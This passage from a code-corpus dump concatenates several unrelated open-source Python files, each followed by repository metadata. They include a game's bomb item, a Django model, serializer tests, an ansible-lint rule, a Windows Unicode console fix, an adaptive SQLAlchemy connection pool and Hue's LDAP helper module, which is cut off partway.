import random
class Bomb(src.items.Item):
"""
ingame item to kill things and destroy stuff
"""
type = "Bomb"
name = "bomb"
description = "designed to explode"
usageInfo = """
The explosion will damage/destroy everything on the current tile or the container.
    Activate it to trigger an explosion.
"""
bolted = False
walkable = True
def __init__(self):
"""
initialise state
"""
super().__init__(display=src.canvas.displayChars.bomb)
def apply(self, character):
"""
handle a character trying to use this item
by exploding
Parameters:
character: the character trying to use this item
"""
character.addMessage("the bomb starts to fizzle")
event = src.events.RunCallbackEvent(
#src.gamestate.gamestate.tick+random.randint(1,4)+delay
src.gamestate.gamestate.tick+1
)
event.setCallback({"container": self, "method": "destroy"})
self.container.addEvent(event)
def destroy(self, generateScrap=True):
"""
destroy the item
Parameters:
generateScrap: flag to toggle leaving residue
"""
if not self.xPosition or not self.yPosition:
return
offsets = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
random.shuffle(offsets)
delay = 1
if isinstance(self.container,src.rooms.Room):
delay = 2
for offset in offsets[:-1]:
new = src.items.itemMap["Explosion"]()
self.container.addItem(new,(self.xPosition-offset[0],self.yPosition-offset[1],self.zPosition))
event = src.events.RunCallbackEvent(
src.gamestate.gamestate.tick + delay
)
event.setCallback({"container": new, "method": "explode"})
self.container.addEvent(event)
super().destroy(generateScrap=False)
src.items.addType(Bomb)
|
MarxMustermann/OfMiceAndMechs
|
src/itemFolder/military/bomb.py
|
Python
|
gpl-3.0
| 1,990
| 0.009045
|
from django.db import models
class Salary(models.Model):
id = models.AutoField(primary_key = True)
bh = models.CharField(max_length = 10)
xm = models.CharField(max_length = 12)
status = models.CharField(max_length = 8)
class Meta:
db_table = 'swan_salary'
def __str__(self):
        return str(self.id)
|
huaiping/pandora
|
salary/models.py
|
Python
|
mit
| 332
| 0.03012
|
import unittest
import serializer
__author__ = 'peter'
class SerializationTests(unittest.TestCase):
def test_serialize_single_key_value_pair(self):
input = [{ 'name': 'value' }]
expected_output = "name=value"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_non_string_type(self):
input = [{ 'name': 5.0 }]
expected_output = "name=5.0"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_single_key_multi_value(self):
input = [{ 'name': ['first', 'second']}]
expected_output = 'name={\r\n\tfirst\r\n\tsecond\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_array_of_kvps(self):
input = [{'name one': 'value one'},{'name two':'value two'}]
expected_output = 'name one=value one\r\nname two=value two'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_array(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': 'derp2'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2=derp2\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_doubly_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': [{'more_nesting':'a thing'}]}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2={\r\n\t\tmore_nesting=a thing\r\n\t}\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
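# --- Illustrative note (not part of the original tests) --------------------
# Taken together, the cases above pin down the format serializer.serialize()
# is expected to produce: a list of single-key dicts becomes "key=value"
# lines joined by CRLF, and nested lists become "key={...}" blocks whose
# members are indented with tabs, e.g.
#   [{'a': 1}, {'b': [{'c': 'd'}]}]  ->  "a=1\r\nb={\r\n\tc=d\r\n}"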
|
PeterDowdy/py-paradox-convert
|
tests/serialization_tests.py
|
Python
|
mit
| 2,040
| 0.007353
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Virgin_islands_us():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Virgin Islands, U.S."]))
|
xbmcmegapack/plugin.video.megapack.dev
|
resources/lib/menus/home_countries_virgin_islands_us.py
|
Python
|
gpl-3.0
| 1,134
| 0.00265
|
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class GitHasVersionRule(AnsibleLintRule):
id = '401'
shortdesc = 'Git checkouts must contain explicit version'
description = (
'All version control checkouts must point to '
'an explicit commit or tag, not just ``latest``'
)
severity = 'MEDIUM'
tags = ['module', 'repeatability', 'ANSIBLE0004']
version_added = 'historic'
def matchtask(self, file, task):
return (task['action']['__ansible_module__'] == 'git' and
task['action'].get('version', 'HEAD') == 'HEAD')
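# --- Illustrative sketch (not part of this rule module) --------------------
# A quick look at what the rule flags: a git task with no explicit "version"
# (or with version: HEAD) matches, while one pinned to a tag does not. The
# task dicts are hand-built stand-ins for what ansible-lint normally passes
# to matchtask(); the repo URL and tag are made-up values and the "file"
# argument is unused by this rule.
if __name__ == '__main__':
    rule = GitHasVersionRule()
    unpinned = {'action': {'__ansible_module__': 'git',
                           'repo': 'https://example.com/repo.git'}}
    pinned = {'action': {'__ansible_module__': 'git',
                         'repo': 'https://example.com/repo.git',
                         'version': 'v1.2.3'}}
    print(rule.matchtask(None, unpinned))  # True  -> rule 401 would fire
    print(rule.matchtask(None, pinned))    # False -> task passes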
|
willthames/ansible-lint
|
lib/ansiblelint/rules/GitHasVersionRule.py
|
Python
|
mit
| 1,699
| 0
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Collection of functions and classes to fix various encoding problems on
multiple platforms with python.
"""
from __future__ import print_function
import codecs
import locale
import os
import sys
# Prevents initializing multiple times.
_SYS_ARGV_PROCESSED = False
def complain(message):
"""If any exception occurs in this file, we'll probably try to print it
on stderr, which makes for frustrating debugging if stderr is directed
to our wrapper. So be paranoid about catching errors and reporting them
to sys.__stderr__, so that the user has a higher chance to see them.
"""
print(
isinstance(message, str) and message or repr(message),
file=sys.__stderr__)
def fix_default_encoding():
"""Forces utf8 solidly on all platforms.
  By default the Python execution environment is lazy and defaults to ascii
encoding.
http://uucode.com/blog/2007/03/23/shut-up-you-dummy-7-bit-python/
"""
if sys.getdefaultencoding() == 'utf-8':
return False
# Regenerate setdefaultencoding.
reload(sys)
# Module 'sys' has no 'setdefaultencoding' member
# pylint: disable=no-member
sys.setdefaultencoding('utf-8')
for attr in dir(locale):
if attr[0:3] != 'LC_':
continue
aref = getattr(locale, attr)
try:
locale.setlocale(aref, '')
except locale.Error:
continue
try:
lang, _ = locale.getdefaultlocale()
except (TypeError, ValueError):
continue
if lang:
try:
locale.setlocale(aref, (lang, 'UTF-8'))
except locale.Error:
os.environ[attr] = lang + '.UTF-8'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
return True
###############################
# Windows specific
def fix_win_sys_argv(encoding):
"""Converts sys.argv to 'encoding' encoded string.
utf-8 is recommended.
Works around <http://bugs.python.org/issue2128>.
"""
global _SYS_ARGV_PROCESSED
if _SYS_ARGV_PROCESSED:
return False
if sys.version_info.major == 3:
_SYS_ARGV_PROCESSED = True
return True
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, c_int, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import LPCWSTR, LPWSTR
# <http://msdn.microsoft.com/en-us/library/ms683156.aspx>
GetCommandLineW = WINFUNCTYPE(LPWSTR)(('GetCommandLineW', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/bb776391.aspx>
CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(
('CommandLineToArgvW', windll.shell32))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [
argv_unicode[i].encode(encoding, 'replace') for i in range(0, argc.value)
]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it
# will have been invoked directly. Otherwise, unicode_argv[0] is the
# Python interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b'-') or arg == b'-':
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the
# module source, but never mind.
break
if arg == u'-c':
argv[0] = u'-c'
break
sys.argv = argv
_SYS_ARGV_PROCESSED = True
return True
def fix_win_codec():
"""Works around <http://bugs.python.org/issue6058>."""
# <http://msdn.microsoft.com/en-us/library/dd317756.aspx>
try:
codecs.lookup('cp65001')
return False
except LookupError:
codecs.register(
lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
return True
class WinUnicodeOutputBase(object):
"""Base class to adapt sys.stdout or sys.stderr to behave correctly on
Windows.
Setting encoding to utf-8 is recommended.
"""
def __init__(self, fileno, name, encoding):
# Corresponding file handle.
self._fileno = fileno
self.encoding = encoding
self.name = name
self.closed = False
self.softspace = False
self.mode = 'w'
@staticmethod
def isatty():
return False
def close(self):
# Don't really close the handle, that would only cause problems.
self.closed = True
def fileno(self):
return self._fileno
def flush(self):
raise NotImplementedError()
def write(self, text):
raise NotImplementedError()
def writelines(self, lines):
try:
for line in lines:
self.write(line)
except Exception as e:
complain('%s.writelines: %r' % (self.name, e))
raise
class WinUnicodeConsoleOutput(WinUnicodeOutputBase):
"""Output adapter to a Windows Console.
Understands how to use the win32 console API.
"""
def __init__(self, console_handle, fileno, stream_name, encoding):
super(WinUnicodeConsoleOutput, self).__init__(
fileno, '<Unicode console %s>' % stream_name, encoding)
# Handle to use for WriteConsoleW
self._console_handle = console_handle
# Loads the necessary function.
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, GetLastError, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE, LPWSTR
from ctypes.wintypes import LPVOID # pylint: disable=no-name-in-module
self._DWORD = DWORD
self._byref = byref
# <http://msdn.microsoft.com/en-us/library/ms687401.aspx>
self._WriteConsoleW = WINFUNCTYPE(
BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(
('WriteConsoleW', windll.kernel32))
self._GetLastError = GetLastError
def flush(self):
# No need to flush the console since it's immediate.
pass
def write(self, text):
try:
if sys.version_info.major == 2 and not isinstance(text, unicode):
# Convert to unicode.
text = str(text).decode(self.encoding, 'replace')
elif sys.version_info.major == 3 and isinstance(text, bytes):
# Bytestrings need to be decoded to a string before being passed to
# Windows.
text = text.decode(self.encoding, 'replace')
remaining = len(text)
while remaining > 0:
n = self._DWORD(0)
# There is a shorter-than-documented limitation on the length of the
# string passed to WriteConsoleW. See
# <http://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = self._WriteConsoleW(
self._console_handle, text,
min(remaining, 10000),
self._byref(n), None)
if retval == 0 or n.value == 0:
raise IOError(
'WriteConsoleW returned %r, n.value = %r, last error = %r' % (
retval, n.value, self._GetLastError()))
remaining -= n.value
if not remaining:
break
text = text[int(n.value):]
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
class WinUnicodeOutput(WinUnicodeOutputBase):
"""Output adaptor to a file output on Windows.
If the standard FileWrite function is used, it will be encoded in the current
code page. WriteConsoleW() permits writing any character.
"""
def __init__(self, stream, fileno, encoding):
super(WinUnicodeOutput, self).__init__(
fileno, '<Unicode redirected %s>' % stream.name, encoding)
# Output stream
self._stream = stream
# Flush right now.
self.flush()
def flush(self):
try:
self._stream.flush()
except Exception as e:
complain('%s.flush: %r from %r' % (self.name, e, self._stream))
raise
def write(self, text):
try:
if sys.version_info.major == 2 and isinstance(text, unicode):
# Replace characters that cannot be printed instead of failing.
text = text.encode(self.encoding, 'replace')
if sys.version_info.major == 3 and isinstance(text, bytes):
# Replace characters that cannot be printed instead of failing.
text = text.decode(self.encoding, 'replace')
self._stream.write(text)
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
def win_handle_is_a_console(handle):
"""Returns True if a Windows file handle is a handle to a console."""
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
INVALID_HANDLE_VALUE = DWORD(-1).value
# <http://msdn.microsoft.com/en-us/library/ms683167.aspx>
GetConsoleMode = WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))(
('GetConsoleMode', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/aa364960.aspx>
GetFileType = WINFUNCTYPE(DWORD, DWORD)(('GetFileType', windll.kernel32))
# GetStdHandle returns INVALID_HANDLE_VALUE, NULL, or a valid handle.
if handle == INVALID_HANDLE_VALUE or handle is None:
return False
return (
(GetFileType(handle) & ~FILE_TYPE_REMOTE) == FILE_TYPE_CHAR and
GetConsoleMode(handle, byref(DWORD())))
def win_get_unicode_stream(stream, excepted_fileno, output_handle, encoding):
"""Returns a unicode-compatible stream.
This function will return a direct-Console writing object only if:
- the file number is the expected console file number
- the handle the expected file handle
- the 'real' handle is in fact a handle to a console.
"""
old_fileno = getattr(stream, 'fileno', lambda: None)()
if old_fileno == excepted_fileno:
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import windll, WINFUNCTYPE
from ctypes.wintypes import DWORD, HANDLE
# <http://msdn.microsoft.com/en-us/library/ms683231.aspx>
GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(('GetStdHandle', windll.kernel32))
real_output_handle = GetStdHandle(DWORD(output_handle))
if win_handle_is_a_console(real_output_handle):
# It's a console.
return WinUnicodeConsoleOutput(
real_output_handle, old_fileno, stream.name, encoding)
# It's something else. Create an auto-encoding stream.
return WinUnicodeOutput(stream, old_fileno, encoding)
def fix_win_console(encoding):
"""Makes Unicode console output work independently of the current code page.
This also fixes <http://bugs.python.org/issue1602>.
Credit to Michael Kaplan
<http://blogs.msdn.com/b/michkap/archive/2010/04/07/9989346.aspx> and
TZOmegaTZIOY
<http://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/1432462#1432462>.
"""
if (isinstance(sys.stdout, WinUnicodeOutputBase) or
isinstance(sys.stderr, WinUnicodeOutputBase)):
return False
try:
# SetConsoleCP and SetConsoleOutputCP could be used to change the code page
# but it's not really useful since the code here is using WriteConsoleW().
# Also, changing the code page is 'permanent' to the console and needs to be
# reverted manually.
# In practice one needs to set the console font to a TTF font to be able to
# see all the characters but it failed for me in practice. In any case, it
# won't throw any exception when printing, which is the important part.
# -11 and -12 are defined in stdio.h
sys.stdout = win_get_unicode_stream(sys.stdout, 1, -11, encoding)
sys.stderr = win_get_unicode_stream(sys.stderr, 2, -12, encoding)
# TODO(maruel): Do sys.stdin with ReadConsoleW(). Albeit the limitation is
# "It doesn't appear to be possible to read Unicode characters in UTF-8
# mode" and this appears to be a limitation of cmd.exe.
except Exception as e:
complain('exception %r while fixing up sys.stdout and sys.stderr' % e)
return True
def fix_encoding():
"""Fixes various encoding problems on all platforms.
Should be called at the very beginning of the process.
"""
ret = True
if sys.platform == 'win32':
ret &= fix_win_codec()
ret &= fix_default_encoding()
if sys.platform == 'win32':
encoding = sys.getdefaultencoding()
if sys.version_info[0] == 2:
ret &= fix_win_sys_argv(encoding)
ret &= fix_win_console(encoding)
return ret
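# --- Illustrative usage sketch (not part of the original module) -----------
# fix_encoding() is intended to be called once, as early as possible in the
# process, before anything is written to stdout or stderr. Running this
# module directly simply applies the fix and reports whether every step
# succeeded.
if __name__ == '__main__':
  print('fix_encoding() -> %r' % fix_encoding())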
|
luci/luci-py
|
client/third_party/depot_tools/fix_encoding.py
|
Python
|
apache-2.0
| 12,497
| 0.009842
|
import sqlalchemy.pool
import time
import math
class SAAutoPool(sqlalchemy.pool.QueuePool):
""" A pool class similar to QueuePool but rather than holding some
minimum number of connections open makes an estimate of how many
connections are needed.
The goal is that new connections should be opened at most once every few
seconds and shouldn't create so many that there will be many idle. """
def __init__(self, creator, pool_size=20, open_interval=5, **kw):
""" Create a new SAAutoPool.
        pool_size is passed to the QueuePool parent. You shouldn't need
to adjust this, it's more to provide a hard maximum on the number of
connections.
open_interval is the target interval between the opening of new
connections, in seconds. The default 5 means to aim for opening a
new connection on average once every 5 seconds. """
super(SAAutoPool, self).__init__(creator, pool_size=pool_size, **kw)
self.open_interval = open_interval
# Start at an expected 5 connections, to avoid large churn on
# startup. The 5 is based on the default 5 in QueuePool.
self.mean = 5
self.rate = 1
self.last_ts = self._get_time()
self.qsize = 1
self.next_update = 0
self.decay_rate = math.log(0.5)/60
def _get_time(self):
# Internal function to allow overriding, primarily for testing.
return time.time()
def _update_qsize(self, ts, checkout):
        # A weighted average, where one minute ago counts half as much.
w = math.exp( (ts-self.last_ts)*self.decay_rate )
self.last_ts = ts
self.rate = w*self.rate
if checkout:
self.rate += (1-math.exp(self.decay_rate))
level = self.checkedout()
self.mean = w*self.mean + (1-w)*level
if ts > self.next_update:
# The idea is that if we know there are 20 checkouts per second,
# then we want to aim that only 5% of checkouts lead to an
# actual new connection. The number of actual connections is
# tracked by the mean, so by using the inverse CDF of the
            # Poisson distribution we can calculate how many connections we
            # actually need to achieve this target.
self.qsize = self._inv_cdf_poisson( 1-(1.0/max(2, self.open_interval*self.rate)), self.mean )
self.next_update = ts+1
@staticmethod
def _inv_cdf_poisson(p, mu):
""" Stupid simple inverse poisson distribution. Actually 1 too high, but that's OK here """
x = 0
n = 0
while x < p:
x += math.exp(-mu)*math.pow(mu, n)/math.factorial(n)
n += 1
return n
def _do_get(self):
self._update_qsize(self._get_time(), True)
conn = super(SAAutoPool, self)._do_get()
# print ">>> last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
return conn
def _do_return_conn(self, conn):
self._update_qsize(self._get_time(), False)
super(SAAutoPool, self)._do_return_conn(conn)
# If there's a connection in the pool and the total connections exceeds the limit, close it.
if self.checkedin() > 0 and self.qsize < self.checkedin() + self.checkedout():
conn = self._pool.get()
conn.close()
# This is needed so the connection level count remains accurate
self._dec_overflow()
# print "<<< last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
|
kleptog/saautopool
|
saautopool.py
|
Python
|
mit
| 3,786
| 0.002905
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2017 Stephen Bunn (stephen@bunn.io)
# GNU GPLv3 <https://www.gnu.org/licenses/gpl-3.0.en.html>
from ._common import *
from .rethinkdb import RethinkDBPipe
from .mongodb import MongoDBPipe
|
ritashugisha/neat
|
neat/pipe/__init__.py
|
Python
|
gpl-3.0
| 255
| 0
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides access to LDAP servers, along with some basic functionality required for Hue and
User Admin to work seamlessly with LDAP.
"""
import ldap
import ldap.filter
import logging
import re
from django.contrib.auth.models import User
import desktop.conf
from desktop.lib.python_util import CaseInsensitiveDict
LOG = logging.getLogger(__name__)
CACHED_LDAP_CONN = None
class LdapBindException(Exception):
pass
class LdapSearchException(Exception):
pass
def get_connection_from_server(server=None):
ldap_servers = desktop.conf.LDAP.LDAP_SERVERS.get()
if server and ldap_servers:
ldap_config = ldap_servers[server]
else:
ldap_config = desktop.conf.LDAP
return get_connection(ldap_config)
def get_connection(ldap_config):
global CACHED_LDAP_CONN
if CACHED_LDAP_CONN is not None:
return CACHED_LDAP_CONN
ldap_url = ldap_config.LDAP_URL.get()
username = ldap_config.BIND_DN.get()
password = desktop.conf.get_ldap_bind_password(ldap_config)
ldap_cert = ldap_config.LDAP_CERT.get()
search_bind_authentication = ldap_config.SEARCH_BIND_AUTHENTICATION.get()
if ldap_url is None:
raise Exception('No LDAP URL was specified')
if search_bind_authentication:
return LdapConnection(ldap_config, ldap_url, username, password, ldap_cert)
else:
return LdapConnection(ldap_config, ldap_url, get_ldap_username(username, ldap_config.NT_DOMAIN.get()), password, ldap_cert)
def get_ldap_username(username, nt_domain):
if nt_domain:
return '%s@%s' % (username, nt_domain)
else:
return username
def get_ldap_user_kwargs(username):
if desktop.conf.LDAP.IGNORE_USERNAME_CASE.get():
return {
'username__iexact': username
}
else:
return {
'username': username
}
def get_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
return User.objects.get(**username_kwargs)
def get_or_create_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
users = User.objects.filter(**username_kwargs)
if users.exists():
return User.objects.get(**username_kwargs), False
else:
username = desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() and username.lower() or username
return User.objects.create(username=username), True
class LdapConnection(object):
"""
Constructor creates LDAP connection. Contains methods
to easily query an LDAP server.
"""
def __init__(self, ldap_config, ldap_url, bind_user=None, bind_password=None, cert_file=None):
"""
Constructor initializes the LDAP connection
"""
self.ldap_config = ldap_config
if cert_file is not None:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_file)
if self.ldap_config.FOLLOW_REFERRALS.get():
ldap.set_option(ldap.OPT_REFERRALS, 1)
else:
ldap.set_option(ldap.OPT_REFERRALS, 0)
if ldap_config.DEBUG.get():
ldap.set_option(ldap.OPT_DEBUG_LEVEL, ldap_config.DEBUG_LEVEL.get())
self.ldap_handle = ldap.initialize(uri=ldap_url, trace_level=ldap_config.TRACE_LEVEL.get())
if bind_user is not None:
try:
self.ldap_handle.simple_bind_s(bind_user, bind_password)
except:
msg = "Failed to bind to LDAP server as user %s" % bind_user
LOG.exception(msg)
raise LdapBindException(msg)
else:
try:
# Do anonymous bind
self.ldap_handle.simple_bind_s('','')
except:
msg = "Failed to bind to LDAP server anonymously"
LOG.exception(msg)
raise LdapBindException(msg)
def _get_search_params(self, name, attr, find_by_dn=False):
"""
if we are to find this ldap object by full distinguished name,
then search by setting search_dn to the 'name'
rather than by filtering by 'attr'.
"""
base_dn = self._get_root_dn()
if find_by_dn:
search_dn = re.sub(r'(\w+=)', lambda match: match.group(0).upper(), name)
if not search_dn.upper().endswith(base_dn.upper()):
raise LdapSearchException("Distinguished Name provided does not contain configured Base DN. Base DN: %(base_dn)s, DN: %(dn)s" % {
'base_dn': base_dn,
'dn': search_dn
})
return (search_dn, '')
else:
return (base_dn, '(' + attr + '=' + name + ')')
def _transform_find_user_results(self, result_data, user_name_attr):
"""
:param result_data: List of dictionaries that have ldap attributes and their associated values. Generally the result list from an ldapsearch request.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:returns list of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
user_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if user_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % user_name_attr)
continue
ldap_info = {
'dn': dn,
'username': data[user_name_attr][0]
}
if 'givenName' in data:
ldap_info['first'] = data['givenName'][0]
if 'sn' in data:
ldap_info['last'] = data['sn'][0]
if 'mail' in data:
ldap_info['email'] = data['mail'][0]
# memberOf and isMemberOf should be the same if they both exist
if 'memberOf' in data:
ldap_info['groups'] = data['memberOf']
if 'isMemberOf' in data:
ldap_info['groups'] = data['isMemberOf']
user_info.append(ldap_info)
return user_info
def _transform_find_group_results(self, result_data, group_name_attr, group_member_attr):
group_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if group_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % group_name_attr)
continue
group_name = data[group_name_attr][0]
if desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get():
group_name = group_name.lower()
ldap_info = {
'dn': dn,
'name': group_name
}
if group_member_attr in data and 'posixGroup' not in data['objectClass']:
ldap_info['members'] = data[group_member_attr]
else:
ldap_info['members'] = []
if 'posixGroup' in data['objectClass'] and 'memberUid' in data:
ldap_info['posix_members'] = data['memberUid']
else:
ldap_info['posix_members'] = []
group_info.append(ldap_info)
return group_info
def find_users(self, username_pattern, search_attr=None, user_name_attr=None, user_filter=None, find_by_dn=False, scope=ldap.SCOPE_SUBTREE):
"""
LDAP search helper method finding users. This supports searching for users
by distinguished name, or the configured username attribute.
:param username_pattern: The pattern to match ``search_attr`` against. Defaults to ``search_attr`` if none.
:param search_attr: The ldap attribute to search for ``username_pattern``. Defaults to LDAP -> USERS -> USER_NAME_ATTR config value.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:param find_by_dn: Search by distinguished name.
:param scope: ldapsearch scope.
:returns: List of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
``
"""
if not search_attr:
search_attr = self.ldap_config.USERS.USER_NAME_ATTR.get()
if not user_name_attr:
user_name_attr = search_attr
if not user_filter:
user_filter = self.ldap_config.USERS.USER_FILTER.get()
if not user_filter.startswith('('):
user_filter = '(' + user_filter + ')'
# Allow wild cards on non distinguished names
sanitized_name = ldap.filter.escape_filter_chars(username_pattern).replace(r'\2a', r'*')
# Fix issue where \, is converted to \5c,
sanitized_name = sanitized_name.replace(r'\5c,', r'\2c')
search_dn, user_name_filter = self._get_search_params(sanitized_name, search_attr, find_by_dn)
ldap_filter = '(&' + user_filter + user_name_filter + ')'
attrlist = ['objectClass', 'isMemberOf', 'memberOf', 'givenName', 'sn', 'mail', 'dn', user_name_attr]
ldap_result_id = self.ldap_handle.search(search_dn, scope, ldap_filter, attrlist)
result_type, result_data = self.ldap_handle.result(ldap_result_id)
if result_type == ldap.RES_SEARCH_RESULT:
return self._transform_find_user_results(result_data, user_name_attr)
else:
return []
def find_groups(self, groupname_pattern, search_attr=None, group_name_attr=None, group_member_attr=None, group_filter=None, find_by_dn=False, scope=ldap.SCOPE_SUBTREE):
"""
LDAP search helper method for finding groups
:param groupname_pattern: The pattern to match ``search_attr`` against. Defaults to ``search_attr`` if none.
:param search_attr: The ldap attribute to search for ``groupname_pattern``. Defaults to LDAP -> GROUPS -> GROUP_NAME_ATTR config value.
:param group_name_attr: The ldap attribute that is returned by the server to map to ``name`` in the return dictionary.
:param find_by_dn: Search by distinguished name.
:param scope: ldapsearch scope.
:returns: List of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'name': <ldap attribute associated with group_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
if not search_attr:
search_attr = self.ldap_config.GROUPS.GROUP_NAME_ATTR.get()
if not group_name_attr:
group_name_attr = search_attr
if not group_member_attr:
group_member_attr = self.ldap_config.GROUPS.GROUP_MEMBER_ATTR.get()
if not group_filter:
group_filter = self.ldap_config.GROUPS.GROUP_FILTER.get()
if not group_filter.startswith('('):
group_filter = '(' + group_filter + ')'
# Allow wild cards on non distinguished names
